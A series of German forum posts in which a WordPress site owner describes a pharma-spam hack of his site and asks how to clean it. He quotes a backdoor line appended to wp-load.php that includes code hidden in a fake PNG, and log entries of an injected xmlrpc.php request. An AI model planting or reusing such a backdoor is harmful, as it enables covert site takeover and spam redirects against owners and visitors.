Beiträge von Fitzkogerd

    Hallo SirEctor,

    jetzt bin ich in dem acces_log auf 89 Einträge der folgenden Art gestoßen:

    89.107.184.0 - - [16/Jul/2018:22:53:13 +0200] "POST /wp-cron.php?doing_wp_cron=1531774392.7679040431976318359375 HTTP/1.0" 200 - "https://www.puli.de/wp-cron.php?do…431976318359375" "YwPJZT0UouYz" http://www.puli.de
    ::1 - - [16/Jul/2018:22:53:24 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.23 (Debian) OpenSSL/1.0.2m (internal dummy connection)" wt14.serverdomain.org

    Dieser Eintrag manipuliert die wp_load.php mit folgendem Eintrag am Ende:

    // Edit and deleting this code is not recommended!
    @include( ABSPATH . WPINC . '/images/tnd.png');

    In der Folge kommt es dann zu neuen Dateien in wp_admin und in der Folge zu einer Weiterleitung auf organic-pills.com, wenn man aus den Googleergebnissen auf die Puli-Seite gelangen möchte.

    Ich habe denn Post zum Bereinigen der Wordpressinstallation gelesen, weis aber nicht, wie die Reihenfolge sein muss:
    1. Erst PWD von Account, FTP und DB ändern
    2. dann wp_includes und wp_admin löschen bzw. neu hochladen? Was bringt das, wenn im root the wp_load.php Datei geändert wird?

    Was passiert, wenn in der zwischenzeit ein erneuter Post stattfindet? Muss ich den Apachen herunterfahren in der Zeit?
    Ein von wordfence angemeckertes Plugin habe ich gelösvht und neu hochgeladen. Seitdem wurde es nicht mehr angemeckert.

    Bitte um Unterstützung.
    Gruß
    Christian

    Habe wordfence installiert und gescannt. Es gab eine Menge Critical und Warnings. Alles Dateien, die laut wordfence da nicht hingehören. Habe sie gelöscht. Die Seite scheint zu functionieren.
    Außerdem waren zwei User mit zu schwachen Passworten ausgestattet, ist auch korrigiert.

    Danke für den hilfreichen Verweis auf den Forumseintrag.

    Das access_log habe ich übnerprüfen lassen, aber das sagt mir nichts. (s. Anhang). Habe die log-DAtei auch mal hochgeladen.

    Was bleibt ist die Frage nach der Sicherheitslücke, die ich nicht beantworten kann. Wie bekomme ich das raus?

    Hallo Maxe, ich war zu schnell. Die Seite wurde wieder gehackt.

    Was habe ich getan, um vermeintlich die Lösung zu haben:
    1. Backup in Test-Instanz auf dem Server eingespielt -> Funktionierte, sogar mit modifiziertem Google-Suchergebnislink. Der hat sonst sofort aauf die SPAM-Seite umgeleitet
    2. Gleiches Back-up in Produktionsumgebung eingespielt. Die Seite hat sofort auf die SPAM.-Seite weitergeleitet. Warum? Keine Ahnung
    3. Testinstanz mit folgenden Plugins installiert:
    -- Antispam-Bee
    -- Antivirus
    -- Rename wp-login.php
    4. Back-up von Testinstanz gemacht und in Produktion eingestellt. Auch hier hat der Google-Suchergebnislink funktioniert.
    5. Bis gerade dachte ich es hätte funktioniert. Google-Ergebnisdarstellung hatte sich auch wieder richtig gezeigt.

    Jetzt bin ich ziemlich frustriert. Habt Ihr noch eine Idee?

    Grüße
    Christian

    Hallo,

    ich bin neu im Forum und hoffe, dass Ihr mir helfen könnt.
    Zu dem obigen Thema habe ich im Forum geschaut, bin aber leider nicht fündig geworden.

    Hier mein Problem:
    Sucht man bei google nach dem Wort "Puli", so erhält man in den ersten Einträgen die Seite http://www.puli.de aufgelistet. Der Text darunter variiert, hat aber mit der Seite nichts zu tun und ist SPAM (z.B. "Phentermine drug information. Without Prescription. Discounts up to 75%. Free shipping available. Special prices for all products. 24/7 Customer Support ..."
    Klickt man auf den Link ("https://www.google.com/url?sa=t&rct=j…JMjhgz3pcISSOaM") zur Seite, wird man meistens auf http://generic-drugs.biz/ weitergeleitet.

    Die Webseite https://www.puli.de wurde im Januar diesen Jahres mit wordpress neu gelauncht.
    Alles hat gut funktioniert. Am 25. Juni habe ich die letzte Änderung an einer Seite gemacht. Alles unauffällig.
    Am 28. Juni wurde ich auf die komische Suchergebnis-Verlinkung hingewiesen.

    Nachfrage bei provider webhostone ergab:
    -------------------------
    so wie es scheint wurde der Cache manipuliert. Ich finde keinerlei Malware bei einem Malwarescan und alle Worttreffer zu den von Ihnen genannten, finde ich nur im Caches des Wordpress.

    In der access_log habe ich folgende Zeile gefunden, allerdings ist das auch die einzige im gesamten Logzeitraum (Heute morgen 28.06.2018 03:47:39):

    POST /xmlrpc.php%20><link%20type%20text/css%20%20media%20all%20%20href%20https:/http://www.puli.de/wp-content/cac…ylesheet%20%20/><title>Where%20to%20purchase%20xanax%20in%20korea%20-%20No%20prescription%20required.</title><link%20rel%20alternate%20%20hreflang%20de%20%20href%20 HTTP/1.0" 200 73862 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36" http://www.puli.de
    In der access_log habe ich folgende Zeile gefunden, allerdings ist das auch die einzige im gesamten Logzeitraum (Heute morgen 03:47:39):

    POST /xmlrpc.php%20><link%20type%20text/css%20%20media%20all%20%20href%20https:/http://www.puli.de/wp-content/cac…ylesheet%20%20/><title>Where%20to%20purchase%20xanax%20in%20korea%20-%20No%20prescription%20required.</title><link%20rel%20alternate%20%20hreflang%20de%20%20href%20 HTTP/1.0" 200 73862 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36" http://www.puli.de

    Ich denke es handelt sich hier um "Cachepoisoning" und die xmlrpc in Verbindung mit dem Autooptimize könnte das Tor dafür sein.

    Wenn Sie den Wordpresscache leeren und mit den Google Webmastertools eine erneute Prüfung beauftragen, sollte sich das wieder normalisieren.
    ----------------------------
    Cache habe ich gelöscht und erneute Prüfung beantragt (s. Anhang). autoptimize und wp rocket habe ich deaktiviert, da ich dachte, der Cache sein das Problem. Hat aber auch nicht geholfen.

    Mit http://www.unmaskparasites.com/ finde ich aber trotzdem noch falsche Links, die im Quelltext nicht zu finden sind (s. Anhang).

    Alle anderen Prüfseiten bringen keine Fehler:
    https://sitecheck.sucuri.net/
    https://app.webinspector.com
    https://www.virustotal.com
    https://quttera.com

    Ich bin mit meinem Latein zu Ende.

    Könnt Ihr mir helfen?

    Beste Grüße
    Christian